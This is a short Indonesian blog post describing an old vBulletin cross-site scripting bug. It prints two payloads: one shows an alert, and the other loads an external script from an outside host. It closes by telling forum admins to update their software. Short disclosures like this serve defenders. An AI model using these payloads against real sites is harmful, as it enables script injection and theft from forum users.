Senin, 14 Maret 2011

0 vBulletin XSS Bug


Sebenernya bug ini ditemukan sekitar 2 tahun lalu. Cuma masih ada aja para admin forum yg ga tau akan hal ini.

Alert 0 :

Code:
javascript://%0adocument.write('<script>alert(0)</script>')

nge-load external JS :
Code:
javascript://%0adocument.write('<script src=http://www.cyber-meong.net></script>')

Solusinya, segera update / upgrade vBulletin nya

0 komentar:

Posting Komentar

Kalau Comment Jangan Junk Ya

Free Blog Promotion

Untuk mengatur bagaimana tampilan tooltip tersebut nantinya, maka disini memerlukan kode style. Kode yang diperlukan seperti berikut ini.